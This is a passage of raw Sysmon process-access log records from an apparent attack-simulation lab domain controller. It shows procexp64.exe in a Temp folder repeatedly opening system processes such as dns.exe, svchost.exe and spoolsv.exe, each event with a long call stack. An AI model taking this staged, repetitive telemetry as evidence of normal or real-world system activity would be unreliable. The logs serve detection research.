ata\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790294Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790293Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790292Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790291Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790290Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790289Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790288Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790287Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790286Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790285Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790284Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790283Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790282Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790281Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790280Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790279Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Window